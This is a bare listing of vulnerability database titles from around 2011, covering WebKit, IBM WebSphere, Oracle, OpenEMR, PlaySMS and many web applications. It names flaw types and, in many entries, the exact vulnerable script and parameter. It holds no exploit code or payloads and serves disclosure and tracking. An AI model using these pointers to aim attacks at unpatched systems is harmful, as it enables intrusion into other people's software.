[76601] Splunk Web Component prototype/segmentation_performance Resource Exhaustion Remote DoS
[76598] IBM WebSphere Application Server (WAS) JMS Provider Authentication Property Storage Weakness
[76592] OpenEMR interface/reports/chart_location_activity.php form_patient_id Parameter SQL Injection
[76591] OpenEMR interface/main/calendar/index.php Multiple Parameter SQL Injection
[76575] IBM WebSphere ILOG Rule Team Server content/error.jsp Unspecified XSS
[76571] Cisco WebEx Player ATAS32 Component WRF File linesProcessed Value Handling Overflow
[76570] Cisco WebEx Player atdl2006.dll WRF File Handling Heap Corruption Remote Overflow
[76564] IBM WebSphere Application Server for z/OS Web Messaging Unspecified XSS
[76563] IBM WebSphere Application Server for z/OS JAX-WS Applications WS-Security Policy Unspecified Issue
[76560] Google Chrome Web Audio Overflow
[76556] WebKit Custom Font Registration Handling Use-after-free Remote Code Execution
[76552] WebKit HTMLPlugInImageElement::allowedToLoadFrameURL JavaScript URI Same Origin Policy Bypass
[76545] WebKit Fragment Navigation History Handling URL Bar Spoofing
[76532] Oracle Siebel CRM UIF Server Component User Interface Unspecified Remote Issue
[76530] Oracle Siebel CRM UIF Client Component User Interface Unspecified Remote Issue
[76494] Oracle WebLogic Server WLS Security Component Unspecified Local Information Disclosure
[76493] Oracle WebLogic Server JMS Component Unspecified Remote Information Disclosure
[76492] Oracle WebLogic Server Web Services Component Unspecified Remote Information Disclosure
[76488] Oracle WebLogic Portal Unspecified Remote Issue
[76476] Oracle Multiple Product Web Container Component Unspecified Remote DoS
[76413] ABUS TVIP 11550/21550 IP Webcams Metacharacter Checking Weakness Arbitrary Command Execution
[76403] Kent Web Forum Unspecified XSS (2011-3984)
[76402] Kent Web Forum Unspecified XSS (2011-3983)
[76401] Kent Web Forum Unspecified XSS (2011-3383)
[76395] Microsys PROMOTIC /webdir/ URI Traversal Arbitrary File Access
[76391] Apple Safari WebKit Private Browsing Mode Cookie Block Bypass
[76387] WebKit Unspecified Memory Corruption (2011-3241)
[76386] WebKit Unspecified Memory Corruption (2011-3239)
[76385] WebKit HTMLBodyElement / StyledElement Removal Use-after-free Issues
[76384] WebKit Audio Node With Media Controls Cloning Bad Cast Memory Corruption
[76383] WebKit FlexBoxIterator Class Child Collapsed Visibility Handling Use-after-free Issue
[76382] WebKit SVG DOM Update Position Values Handling Use-after-free Issue
[76373] Apple Mac OS X QuickTime Save for Web Export MitM Weakness XSS
[76367] Apple Mac OS X libsecurity Nonstandard Certificate Revocation Website / Email Handling Remote Code Execution
[76363] Apple Mac OS X File Systems WebDAV Volume Handling HTTPS Server Certificate Weakness Information Disclosure
[76353] WebKit DOMWindow::setLocation Inactive DOM Window Handling Universal XSS
[76352] WebKit Unspecified Memory Corruption (2011-3244)
[76351] WebKit Unspecified Memory Corruption (2011-3237)
[76350] WebKit Unspecified Memory Corruption (2011-3236)
[76349] WebKit Unspecified Memory Corruption (2011-3235)
[76348] WebKit Unspecified Memory Corruption (2011-2831)
[76347] WebKit Unspecified Remote Memory Corruption (2011-2820)
[76346] WebKit Unspecified Memory Corruption (2011-2817)
[76345] WebKit Unspecified Memory Corruption (2011-2816)
[76344] WebKit Unspecified Memory Corruption (2011-2814)
[76343] WebKit Document Class Associated Form Elements Use-after-free Issue
[76342] WebKit Multiple Functions Out-of-bounds Read Issues
[76341] WebKit Document::finishedParsing Frame Handling Use-after-free
[76340] WebKit getImageData / createImageData Out-of-bounds Read Issue
[76339] WebKit Document::setBody document.body Setting Use-after-free Issue
[76338] WebKit XMLDocumentParser::insertErrorMessageBlock Use-after-free Issue
[76337] WebKit Auto-Focus Handling Bad Cast Memory Corruption
[76336] WebKit XMLDocumentParser::endElementNs / XMLDocumentParser::parseEndElement Use-after-free Issue
[76335] Apple iOS UIKit Alerts Maximum Text Layout Length Limit Website tel: URI Handling Remote DoS
[76334] Apple iOS Safari HTTP Content-Disposition Header Weakness Website File Handling XSS
[76323] Apple iOS CoreFoundation String Tokenization Website / Email Message Handling Memory Corruption
[76279] atvise webMI2ADS Negative Content-Length HTTP Header Parsing Memory Consumption Remote DoS
[76278] atvise webMI2ADS shuttdown Page Access Restriction Weakness Remote DoS
[76277] atvise webMI2ADS Authentication NULL Pointer De-reference Authorization HTTP Header Parsing Remote DoS
[76276] atvise webMI2ADS URI Traversal Arbitrary File Access
[76257] Webkit PDFs Extension for TYPO3 Unspecified Remote Command Execution
[76256] Webkit PDFs Extension for TYPO3 Unspecified SQL Injection
[76238] IBM WebSphere ILOG Rule Team Server teamserver/faces/home.jsp project Parameter XSS
[76228] Weblinks Component for Joomla! index.php Itemid Parameter SQL Injection
[76214] Microsoft .NET Framework / Silverlight Class Inheritance Restriction Web Page Handling Remote Code Execution
[76190] WordPress Website Handling Clickjacking Weakness
[76187] Pantech Web Browser basicConstraints Parameter SSL Certificate Spoofing Weakness
[76155] openEngine openengine/cms/website.php Multiple Parameter SQL Injection
[76128] radvd device-linux.c set_interface_var() Function Symlink / Traversal Local Arbitrary File Overwrite
[76080] Cisco Network Admission Control (NAC) Management Interface URI Traversal Arbitrary File Access
[76079] Apache HTTP Server mod_proxy Module Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
[76063] WebKit Window Prototype Named Property Confusion Same Origin Policy Bypass
[76027] WebAsyst Shop-Script index.php blog_id Parameter SQL Injection
[76023] Google Website Optimizer Component for Joomla! Section Names pggwob Page Tags XSS
[76003] QtWeb Browser URL Display Spoofing Weakness
[75956] Web Minimalist 200901 Theme for WordPress index.php PATH_INFO XSS
[75932] Ad Manager Pro website-page.php pageId Parameter SQL Injection
[75905] WebsiteBaker Multiple Script Direct Request Path Disclosure
[75904] WEBinsta Multiple Script Direct Request Path Disclosure
[75903] WeBid Multiple Script Direct Request Path Disclosure
[75902] WebCalendar Multiple Script Direct Request Path Disclosure
[75898] TinyWebGallery i_frames/i_register.php Direct Request Path Disclosure
[75843] Mozilla Multiple Products WebGL Test Case Unspecified Out-of-bounds Write Memory Corruption
[75842] Mozilla Multiple Products WebGL ANGLE GrowAtomTable() Function Overflow
[75800] Sunway ForceControl WebServer Triple Dot Traversal Arbitrary File Access
[75773] Novell GroupWise WebAccess Address Book Multiple Parameter XSS
[75733] 111WebCalendar Multiple Script Direct Request Path Disclosure
[75726] Atlassian JIRA JIRA Bamboo Plugin Admin Interface Unspecified XSS
[75721] IceWarp Mail Server server/webmail.php Soap Message Parsing Remote Arbitrary File Disclosure
[75718] IBM WebSphere Application Server (WAS) Unspecified CSRF
[75691] Cisco Linksys WRT54G Admin Screen Filters.asp Website Blocking by Keyword Field XSS
[75620] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fws/ajax/init.inc.php wpabspath Parameter Remote File Inclusion
[75619] Zingiri Web Shop Plugin for WordPress wp-content/plugins/zingiri-web-shop/fwkfor/ajax/init.inc wpabspath Parameter Remote File Inclusion
[75615] AllWebMenus Plugin for WordPress wp-content/plugins/allwebmenus-wordpress-menu-plugin/actions.php abspath Parameter Remote File Inclusion
[75613] JBoss Multiple Product Web Services Native DTD Parsing Remote DoS
[75587] SAP NetWeaver com.sap.ipc.webapp.ipcpricing Unspecified Remote Information Disclosure
[75579] SAP NetWeaver Web Application Server SHORTCUT ICF Unspecified Remote Information Disclosure
[75578] SAP NetWeaver Web Application Server WEBRFC ICF Unspecified XSS
[75577] SAP NetWeaver Web Application Server (WebAS) cachetest ERP Unspecified Remote DoS
[75576] IBM Lotus Domino WebAdmin.nsf PanelIcon Parameter fmpgPanelHeader ReadForm Action XSS
[75574] Cogent DataHub Web Server Executable File Source Code Disclosure
[75549] Google Chrome WebSockets Unspecified Remote DoS
[75534] Trustwave WebDefend bgoperator Account Default Password
[75533] Trustwave WebDefend vi Text Editor Privilege Escalation
[75516] webSPELL Multiple Script Direct Request Path Disclosure
[75514] WebsiteBaker admin/groups/add.php group_name Parameter SQL Injection
[75513] WebsiteBaker admin/users/add.php Multiple Parameter SQL Injection
[75512] WebsiteBaker Multiple /modules/ Script Path Disclosure
[75507] WebCalendar colors.php color Parameter XSS
[75506] WebCalendar login.php last_login Parameter XSS
[75494] Progea Movicon / PowerHMI Content-Length HTTP Header Web Request Parsing Remote Overflow
[75454] DivX Plus Web Player DivXPlaybackModule.dll file:// URL Handling Overflow
[75444] Microsoft Windows WINS Loopback Interface Crafted Packet Local Privilege Escalation
[75428] IBM WebSphere Commerce Web Service Activity Token Unspecified Issue
[75360] Ripe Website Manager ripe/index.php v Parameter SQL Injection
[75359] Ripe Website Manager ripe/modules/members/admin.php CSRF
[75358] Ripe Website Manager ripe/modules/page/admin.php id Parameter SQL Injection
[75353] Balitbang CMS FCKeditor /webtemp/functions/editor/filemanager/connectors/php/config.php Arbitrary File Upload
[75340] Web Poll Pro poll/submit.php error Parameter XSS
[75312] Trend Micro WebReputation API Bypass
[75309] CMS WebManager-Pro index.php menu_id Parameter XSS
[75304] PlaySMS SMS Gateway web/plugin/themes/work2/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion
[75303] PlaySMS SMS Gateway web/plugin/themes/work2/page_login.php apps_path[themes] Parameter Remote File Inclusion
[75302] PlaySMS SMS Gateway web/plugin/themes/work2/page_forgot.php apps_path[themes] Parameter Remote File Inclusion
[75301] PlaySMS SMS Gateway web/plugin/themes/km2/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion
[75300] PlaySMS SMS Gateway web/plugin/themes/default/page_register.php apps_path[themes] Parameter Remote File Inclusion
[75299] PlaySMS SMS Gateway web/plugin/themes/default/page_noaccess.php apps_path[themes] Parameter Remote File Inclusion
[75298] PlaySMS SMS Gateway web/plugin/themes/default/page_login.php apps_path[themes] Parameter Remote File Inclusion
[75297] PlaySMS SMS Gateway web/plugin/themes/default/page_forgot.php apps_path[themes] Parameter Remote File Inclusion
[75255] WebKit Cross-Origin Drag-and-Drop Frame Handling Information Disclosure Weakness
[75254] WebKit Attr.style Accessor Parsing Same Origin Policy Bypass Universal XSS
[75253] WebKit HTTP Basic Authentication Authorization HTTP Header Logging Remote Credential Disclosure
[75237] babelweb Supplementary Group Dropping Local Privilege Escalation
[75221] PlaySMS SMS Gateway web/plugin/themes/work2/page_register.php apps_path[themes] Parameter Remote File Inclusion
[75207] WebsiteBaker Unspecified XSS
[75189] Multiple Router Embedded Web Server DSL Password Input Field Source Code Password Disclosure
[75135] Martinweb CMS index.php pages Parameter SQL DB Structure Disclosure
[75134] Martinweb CMS index.php Multiple Parameter XSS
[75133] Martinweb CMS sitesearch XSS
[75087] TP-LINK TL-WR740N WebConsole / UPnP Services Packet Saturation Remote DoS
[75054] Unidesk /Uni.Web/Reporting/Default.aspx ReportingService Session Credential Verification Weakness Remote Information Disclosure
[75036] Advantech/Broadwin WebAccess Unspecified Filter Bypass SQL Injection
[75035] Advantech/Broadwin WebAccess Unspecified Remote DoS
[75034] Advantech/Broadwin WebAccess Multiple ActiveX Unspecified Issues
[75013] WebKit Cached Resources Cache Poisoning Remote DoS
[74999] Babylon Web Site Translation XSS
[74970] CA Total Defense Heartbeat Web Service FileUploadHandler.ashx GUID Parameter Traversal Arbitrary File Upload
[74967] CA Total Defense Web Management Service management.asmx Module getDBConfigSettings() Method Remote Server Database Credentials Disclosure
[74965] Symantec PGP Universal Web Messenger lnj.e retryURL Parameter Arbitrary Site Redirect
[74914] ACTi Multiple Products Web Configurator cgi-bin/test iperf Parameter Remote Command Injection
[74898] Advantech/Broadwin WebAccess Client ActiveX (bwocxrun.ocx) Multiple Method fpt Parameter Memory Corruption
[74897] Advantech/Broadwin WebAccess Client ActiveX (bwocxrun.ocx) OcxSpool() Method Format String
[74867] InduSoft Web Studio ISSymbol ActiveX (ISSymbol.ocx) Multiple Method Overflow
[74842] WebKit counterToCSSValue NULL Pointer Dereference DoS Weakness
[74830] IBM WebSphere Application Server (WAS) Community Edition Tomcat Webdav Servlet Unspecified Issue
[74828] Opera Web Content Security Display Weakness
[74817] IBM WebSphere Application Server (WAS) Administration Console Unspecified Traversal Arbitrary File Access
[74815] babelweb user Option Local Privilege Escalation
[74795] RT Search Interface Encrypted Password Disclosure
[74790] Newscoop Admin Interface Template Manipulation Arbitrary File Access
[74789] Newscoop Admin Interface Campsite edit_template.php Path Parameter Arbitrary File Disclosure
[74788] Newscoop Admin Interface Unspecified Local File Execution
[74786] Newscoop Admin Interface Unspecified Issue
[74779] Cisco Multiple Products Open Query Interface Remote Information Disclosure
[74773] IBM Web Application Firewall Query String Parameter Substring Remote Intrusion Prevention Bypass
[74756] icedtea-web Java Web Start Security Warning Dialog Manipulation Weakness
[74676] Linux Kernel /proc/PID/io Interface Cross Session User Information Disclosure
[74592] Mozilla Multiple Products WebGL Unspecified DoS
[74591] Mozilla Multiple Products WebGL Shader Compiler ShaderSource Method Overflow
[74590] Mozilla Multiple Products WebGL Almost Native Graphics Layer Engine (ANGLE) Shader Pre-Processor Overflow
[74567] Roundcube Webmail Multiple Unspecified Script _mbox Parameter XSS
[74523] Novell Data Synchronizer Mobility Pack WebAdmin Weak SSL Cipher Support Brute Force Weakness
[74520] Novell Data Synchronizer Mobility Pack WebAdmin Unspecified Session Fixation
[74519] Novell Data Synchronizer Mobility Pack WebAdmin Remote Authentication Bypass GroupWise Information Disclosure
[74511] IBM WebSphere Service Registry and Repository (WSRR) agentDetect.jsp User-Agent HTTP Header XSS
[74412] HP WebOS Contacts Application Unspecified XSS
[74411] HP WebOS Calendar Application Unspecified XSS
[74406] Microsoft Windows Remote Desktop Web Access Logon Page Unspecified XSS
[74380] Google Chrome WebGL Fragment Shader Arbitrary Cross-domain Image Disclosure
[74357] CA SiteMinder Web Agents Multi-line Header Injection Spoofing Remote Privilege Escalation
[74344] CA Output Management Web Viewer PPSViewer ActiveX (PPSView.ocx) SRC Parameter Overflow
[74343] CA Output Management Web Viewer UOMWV_Helper ActiveX (UOMWV_HelperActiveX.ocx) Title Property Overflow
[74342] Webmin useradmin/user-lib.pl chfn Command Full Name Field XSS
[74335] Hitachi Web Server TLS Renegotiation Handshakes MiTM Plaintext Data Injection
[74318] Trend Micro Control Manager WebApp/widget/proxy_request.php module Parameter Traversal Arbitrary File Access
[74309] Mongoose mongoose.c put_dir() Function HTTP PUT Web Request Parsing Overflow
[74280] iWebkit Theme for Drupal Menu Links XSS
[74238] WebKit Web Inspector Object Tree Serialization Unspecified Overflow
[74162] CA ARCserve D2D homepageServlet Google Web Toolkit (GWT) RPC Request Parsing Admin Credential Disclosure
[74149] MinaliC Web Request %20 Character Parsing Remote Source Code Disclosure
[74097] OTRS (Open Ticket Request System) Rich-text-editor Component Customer Interface Source Code Feature XSS
[74096] OTRS (Open Ticket Request System) Customer Interface Ticket-print Dialog Multiple Field Remote Information Disclosure
[74072] Samba Web Administration Tool (SWAT) Change Password Page user Field XSS
[74071] Samba Web Administration Tool (SWAT) Multiple Function CSRF
[74049] Recipes website Script Silver Edition viewRecipe.php recipeId Parameter SQL Injection
[74025] OTRS (Open Ticket Request System) CustomerInterface Component Unspecified Remote Access Restriction Bypass
[74023] OTRS (Open Ticket Request System) Kernel/System/Web/Request.pm Directory Permissions Weakness Local Access Restriction Bypass
[74021] WebKit HistoryController Form Resubmission Use-after-free Issue
[74019] WebKit parseURL CSS Parser URL Handling Arbitrary File Disclosure
[74018] WebKit Cross-origin Username URL Handling XSS
[74016] WebKit Table Caption Layout Handling Use-after-free Arbitrary Code Execution
[74015] WebKit isDeletableElement Use-after-free Arbitrary Code Execution
[74014] WebKit Geolocation Permission Response Page Close Handling Use-after-free Issue
[74013] WebKit SVG Marker Update Handling Use-after-free Issue
[74012] WebKit SVGTextRunWalker::walk svg/SVGFont.cpp Buffer Overflow
[74011] WebKit Unspecified Memory Corruption (2011-0255)
[74010] WebKit Unspecified Memory Corruption (2011-0254)
[74009] WebKit Unspecified Memory Corruption (2011-0253)
[74008] WebKit SVG Tags animVal Property Handling Use-after-free Arbitrary Code Execution
[74007] WebKit Unspecified Memory Corruption (2011-0238)
[74006] WebKit Unspecified Memory Corruption (2011-0237)
[74005] WebKit Unspecified Memory Corruption (2011-0235)
[74004] WebKit Detached Body Element Handling Use-after-free Arbitrary Code Execution
[74003] WebKit Unspecified Memory Corruption (2011-0233)
[74002] WebKit Unspecified Memory Corruption (2011-0232)
[74001] WebKit Unspecified Memory Corruption (2011-0225)
[74000] WebKit Frameset Element Style Attribute Handling Buffer Overflow
[73999] WebKit Unspecified Memory Corruption (2011-0222)
[73998] WebKit Unspecified Memory Corruption (2011-0221)
[73997] WebKit Unspecified Memory Corruption (2011-0218)
[73995] Apple Safari AutoFill Web Forms Address Book Information Disclosure
[73993] WebKit TIFF Image Handling Use-after-free Arbitrary Code Execution
[73979] AR Web Content Manager (AWCM) header.php Multiple Cookie Traversal Arbitrary File Access
[73978] AR Web Content Manager (AWCM) index.php Multiple Cookie Traversal Arbitrary File Access
[73903] IBM WebSphere Application Server (WAS) logoutExitPage Parameter Arbitrary Site Redirect
[73898] IBM WebSphere Application Server (WAS) Administration Console Request Local Stack Trace Information Disclosure
[73886] Auto Web Toolbox details.php id Parameter SQL Injection
[73885] OTRS (Open Ticket Request System) iPhoneHandle Package Interface Unspecified Remote Privilege Escalation
[73883] IBM Tivoli Directory Server Web Administration Tool IDSWebApp Authentication Field Autocomplete Remote Access Bypass
[73871] Roundcube Webmail Login Form Email Message Composition Remote Information Disclosure
[73870] Roundcube Webmail steps/utils/modcss.inc External CSS Request Remote Information Disclosure
[73865] MediaCAST New Atlanta BlueDragon Admin Interface External TCP Connection Unspecified Remote Issue
[73864] MediaCAST New Atlanta BlueDragon Admin Interface Multiple Unspecified XSS
[73862] IBM Rational DOORS Web Access Login Component New User Account License Consumption Remote DoS
[73840] Opera Web Workers Application Crash DoS
[73809] Hitachi JP1/Performance Management Web Console Unspecified XSS
[73801] ANGLE WebGLES Graphics Library AddString Shader Loading Overflow
[73774] WebKit Web Inspector window.console._inspectorCommandLineAPI Same Origin Policy Bypass XSS
[73773] WebKit Windows Functionality Same Origin Policy Bypass Arbitrary File Disclosure
[73771] WebKit WebGL Stencil Buffers Initialization Arbitrary Video Memory Read Issue
[73765] OpenJDK Runtime Environment IcedTea-Web JNLPClassLoader Multiple Signer Remote Privilege Escalation
[73762] AR Web Content Manager (AWCM) control/common.php lang_file Parameter Remote File Inclusion
[73761] AR Web Content Manager (AWCM) header.php theme_file Parameter Remote File Inclusion
[73760] AR Web Content Manager (AWCM) includes/window_top.php theme_file Parameter Remote File Inclusion
[73758] Webmatic index.php p Parameter SQL Injection
[73732] WeBid USERLANGUAGE Cookie Traversal Local File Inclusion
[73727] RealityServer Web Services RTMP Server NULL Pointer Remote DoS
[73720] web.go get_secure_cookie Cookie Timestamp Validation Weakness
[73704] IBM WebSphere MQ CDP Certificate Extension Revoked Certificate MiTM SSL Partner Spoofing Weakness
[73696] m0n0wall WebGUI Password Plaintext Local Disclosure
[73664] LuxCal Web Calendar index.php id Parameter SQL Injection
[73658] Symantec Web Gateway forget.php username Parameter SQL Injection
[73630] F5 BIG-IP ASM Web Scraping Unspecified XSS
[73610] WeBid index.php lan Parameter Traversal Local File Inclusion
[73609] WeBid converter.php Multiple Parameter Remote PHP Code Injection
[73608] WeBid Multiple Script WEBID_ONLINE Cookie SQL Injection
[73607] WeBid logout.php WEBID_RM_ID Cookie SQL Injection
[73606] WeBid feedback.php auction_id Parameter SQL Injection
[73601] WebDefend Enterprise Application Server Hardcoded Console Credentials Security Event Data Remote Disclosure
[73592] HP WebOS Contacts Application Imported Contact Multiple Field XSS
[73584] WHMCompleteSolution (WHMCS) weblink_cat_list.php bcat_id Parameter SQL Injection
[73549] IBM Rational DOORS Web Access Unspecified Issue
[73548] IBM Rational DOORS Web Access Server Error Response Unspecified Issue
[73547] IBM Rational DOORS Web Access Unspecified XSS
[73546] IBM Tivoli Directory Server Web Administration Tool IDSWebApp Log File Information Disclosure
[73511] WebKit SVG Use Element Shadow Building Document Children Removal Use-after-free
[73510] WebKit HTML Parser ContainerNode::parserAddChild Use-after-free
[73483] NetServe Web Server Multiple Unspecified Remote DoS
[73482] NetServe Web Server Multiple Unspecified Local File Inclusion
[73481] NetServe Web Server Multiple Unspecified Remote File Inclusion
[73480] NetServe Web Server admin/mimetypes.html Multiple Parameter XSS
[73479] NetServe Web Server admin/host_0/ssioptions.html Multiple Parameter XSS
[73468] WebDefend Enterprise Management Port Default Account Credentials Event Collection Table Remote Disclosure
[73434] Asterisk Multiple Products Manager Interface manager.c Originate Action Remote Command Execution
[73427] BlackBerry Enterprise Server Multiple Products Web Desktop Manager webdesktop/app displayErrorMessage Parameter XSS
[73413] InduSoft Web Studio NTWebServer Traversal Arbitrary Code Execution
[73386] IBM WebSphere Application Server (WAS) Web Services SAAJ Encrypted SOAP Message Remote DoS
[73385] IBM WebSphere Application Server (WAS) Security Component AuthCache Purge PlatformCredential Cache Remote Privilege Escalation
[73381] IBM WebSphere Application Server (WAS) Security Component TIP/eWAS Framework AuthCache Entry Remote Access Bypass
[73380] Microsoft Lync Web Components Server Reach/Client/WebPages/ReachJoin.aspx reachLocale Parameter XSS
[73379] IBM WebSphere Application Server (WAS) Security Component LTPA Token Memory Consumption Remote DoS
[73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
[73355] IBM WebSphere Application Server (WAS) JavaServer Pages com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl JSP Request Memory Leak Remote DoS
[73354] IBM WebSphere Application Server (WAS) HTTP Transport SIP Proxy UDP Message Saturation Remote DoS
[73353] IBM WebSphere Application Server (WAS) Messaging Engine JMS Receive Call NULL Return Memory Leak Remote DoS
[73352] IBM WebSphere Application Server (WAS) Service Integration Bus (SIB) Messaging Engine Queue Manager Close Operation Remote DoS
[73350] IBM WebSphere Application Server (WAS) IIOP Request Rejection Double-free Remote DoS
[73349] IBM WebSphere Application Server (WAS) Administrative Console Primary admin ID Mapping Access Restriction Bypass
[73348] IBM WebSphere Application Server (WAS) Security Component ibm-application-bnd.xml Security Role Mapping Remote Privilege Escalation
[73347] IBM WebSphere Application Server (WAS) Administrative Scripting Tools Multiple Log Files wsadmin Command Local Information Disclosure
[73346] IBM WebSphere Application Server (WAS) HTTP Server Plugin Trace Request XSS
[73341] IBM WebSphere Application Server (WAS) Installer Temporary Log Directory Permissions Weakness Local File Access
[73338] Cisco Secure Desktop (CSD) CSDWebInstaller.ocx ActiveX inst.exe Program Name Remote Program Execution
[73337] Cisco Secure Desktop (CSD) CSDWebInstaller.ocx ActiveX Installation Process Signature Verification Weakness Arbitrary Code Execution
[73302] LMS Web Ensino index.php Multiple Parameter XSS
[73301] LMS Web Ensino index.php codBibliotecaCategoria Parameter SQL Injection
[73300] LMS Web Ensino User Password Change CSRF
[73299] LMS Web Ensino Cookie Re-use Session Fixation
[73289] IBM WebSphere Application Server (WAS) WS-Security XML Encryption Algorithm Weakness Plaintext Data Disclosure
[73284] CMS WebManager-Pro /admin Login Field SQL Injection
[73283] CMS WebManager-Pro index.php word Parameter XSS
[73282] CMS WebManager-Pro edit_content.php Arbitrary Page Edit CSRF
[73281] CMS WebManager-Pro Multiple Page Text Field Arbitrary PHP Code Execution
[73266] MidiCMS Website Builder admin/jscripts/tiny_mce/plugins/ezfilemanager/index.php Arbitrary File Upload
[73265] MidiCMS Website Builder Page Deletion CSRF
[73231] IBM Datacap Taskmaster Capture Web Client Service Cleartext Password Weakness
[73227] IBM Web Content Manager (WCM) Authoring Tool Draft Creation Remote Access Restriction Bypass
[73226] IBM Web Content Manager (WCM) StackOverflowError Exception Race Condition Remote DoS
[73225] IBM WebSphere Portal OutputMediator Object Request Remote DoS
[73210] HP Web Jetadmin Unspecified Local Access Restriction Bypass
[73202] WeblyGo Unspecified XSS
[73199] CIDWeb CidWebPwd/errpage.asp Multiple Parameter XSS
[73191] Mozilla Multiple Products WebGL Invalid Write Remote Code Execution
[73190] Mozilla Multiple Products WebGL Out-of-bounds Read GPU Processes Information Disclosure
[73189] Mozilla Multiple Products WebGL Texture Image Rendering Cross-domain Image Data Disclosure
[73160] HP Photosmart Multiple Products Embedded Web Server SNMP Remote Information Disclosure
[73159] HP Photosmart Multiple Products Embedded Web Server Webscan Scan Surface Remote Document Access
[73149] AR Web Content Manager (AWCM) search.php search Parameter XSS
[73145] openSUSE Build Service (OBS) webui Component Login Page XSS
[73124] Sunway ForceControl Web Server (httpsvr.exe) URI Handling Remote Overflow
[73114] Hitachi Web Server Directory Indexes DoS
[73110] WeBid adsearch.php maxprice Parameter SQL Injection
[73101] Mozilla Firefox WebGL Graphics Memory Information Disclosure
[73080] Oracle Java SE / JRE Java Web Start DLL Search Path Subversion Arbitrary DLL Injection Code Execution
[73079] Oracle Java SE / JRE Java Web Start File Search Path Policy File Loading Remote Code Execution
[73078] Oracle Java SE / JRE Java Web Start File Search Path Settings Files Loading Remote Code Execution
[73073] Oracle Java SE / JRE jnlp File Properties Handling Web Start Command Argument Injection Remote Code Execution
[73052] IBM WebSphere Application Server (WAS) Admin Security Disable CSRF
[73035] GNOME Display Manager (gdm) glib2 Web Browser x-scheme-handler/http MIME Type Local Privilege Escalation
[72983] TinyWebGallery /admin/index.php item Parameter Traversal Arbitrary File Access
[72970] WebSVN dl.php path Parameter Shell Command Injection
[72966] OTRS (Open Ticket Request System) webscript.pl Remote Command Execution
[72940] Libvoikko Python / Java Interface NULL Character Handling DoS
[72937] Microsoft Windows Active Directory Certificate Services Web Enrollment XSS
[72914] HotWeb Rentals resorts.asp PropResort Parameter SQL Injection
[72912] IBM WebSphere Application Server (WAS) JAAS Login Null Password Hashtable Login Authentication Bypass
[72889] WellinTech KingView ActiveX (KVWebSvr.dll) ValidateUser Method Overflow
[72871] Siemens SIMATIC S7-1200 CPU Web Server Network Request Saturation Remote DoS
[72869] Advantech/Broadwin WebAccess webvrpcs.exe Service Remote Code Execution
[72867] Advantech/Broadwin WebAccess bwocxrun.ocx ActiveX Arbitrary Code Execution
[72863] Simple web-server URI Traversal Arbitrary File Access
[72811] CodeMeter WebAdmin Licenses.html BoxSerial Parameter XSS
[72808] Seo Panel websites.php url Parameter SQL Injection
[72780] WebKit CSS Visited Link Style History Information Disclosure
[72740] AIDeX Mini-WebServer *chat/post.html nick Parameter XSS
[72731] Kentico CMS examples/webparts/membership/users-viewer.aspx userContextMenu_parameter Parameter XSS
[72699] IBM WebSphere Application Server (WAS) Admin Console /ibm/console/jvmLogDetail.do runtimeErrFileName Parameter Arbitrary File Access
[72693] Cherokee Admin Interface Arbitrary Command Execution CSRF
[72690] WebKit RenderLineBoxList::dirtyLinesFromChangedChild Use-after-free Arbitrary Code Execution
[72669] web@all dat/cache_tpl/web/_msg.htm.php Multiple Page XSS
[72668] web@all dat/cache_tpl/web/search.htm.php (search.php) _sv Parameter XSS
[72667] web@all mem/action.php filename Parameter SQL Injection
[72658] IB Promotion Advanced Business Web Suite Search Facility qs Parameter XSS
[72607] Cisco TelePresence Recording Server XML-RPC Interface Unspecified Unauthenticated Command Execution
[72603] Cisco TelePresence Java Servlet RMI Interface Multiple Crafted Requests Remote DoS
[72596] Cisco TelePresence Java RMI Interface Unspecified Remote Command Injection
[72504] WebKit RenderBox::removeFloatingOrPositionedChildFromBlockLists Floats Rendering Use-after-free Issue
[72500] IBM WebSphere Portal Search Center Unspecified XSS
[72489] WebKit WebGL Rendering Context Removal Use-after-free Remote Code Execution
[72487] WebKit V8DataView::constructorCallback DataView Object Handling Remote Code Execution
[72478] WebKit Web Workers Cross-Origin Error Message Leak Same Origin Policy Bypass
[72476] WebKit Elements Referencing Counter Nodes Cloning Use-after-free
[72463] SecureSphere Web Application Firewall String Concatenation SQL Injection Filter Bypass
[72460] Mozilla Multiple Products Web Workers Garbage Collection Use-after-free Remote Code Execution
[72436] SMC / Comcast DOCSIS Business Gateways Web Management Portal Session Generation Weakness
[72433] Cisco WebEx Meeting Center ATP File Handling Overflow
[72432] Cisco WebEx WRF File Handling Overflow
[72430] Mitel Audio and Web Conferencing wd/applets/Error.asp type Parameter XSS
[72429] Mitel Audio and Web Conferencing wd/connect.asp Multiple Parameter XSS
[72428] Mitel Audio and Web Conferencing wd/wdinvite.asp SID Parameter XSS
[72409] Webform Module for Drupal Webform File Upload Filename XSS
[72408] Webform Module for Drupal New Webform Field name Parameter XSS
[72400] TWiki bin/login/Sandbox/WebHome origurl Parameter XSS
[72370] WebKit SVG Filters Transforms Handling Multiple Integer Overflows
[72369] WebKit SVG Image Media Type Bad Cast Memory Corruption
[72319] HP Palm WebOS Plug-in Development Kit Unspecified Arbitrary File Overwrite
[72318] HP Palm WebOS Email Unspecified XSS
[72314] IBM Datacap Taskmaster Capture TMWeb Unspecified SQL Injection
[72300] IBM WebSphere Application Server for z/OS Permissions Weakness Access Restriction Bypass
[72298] Edraw Office Viewer Component ActiveX HttpPost() Method WebUrl Parameter Overflow
[72295] IBM WebSphere DataPower XC10 Appliance Unspecified Java Issue
[72283] WebKit Key Frame Rule Stylesheet Removal Use-after-free
[72282] WebKit Forms Control Handling Use-after-free
[72279] WebKit 'RenderTable::addChild' Table Handling Use-after-free
[72278] WebKit 'RenderTable::firstLineBoxBaseline' Table Rendering Use-after-free
[72273] Google Chrome WebGL drawElements Arbitrary Memory Read Issue
[72271] Google Chrome WebGL Out-of-bounds Read Unspecified DoS (2011-1122)
[72262] WebKit SVG Text Handling 'insertedIntoDocument' Stale Pointer
[72216] WebKit Non-styled Element Removal ID Mapping Use-after-free
[72214] Google Chrome WebSockets Use-after-free Unspecified DoS
[72207] WebKit Node Removal Custom Event Handlers DOM Tree Corruption
[72206] WebKit Floating Select Lists Casting Memory Corruption
[72196] WebKit Floating Object Handling Stale Pointer Issue
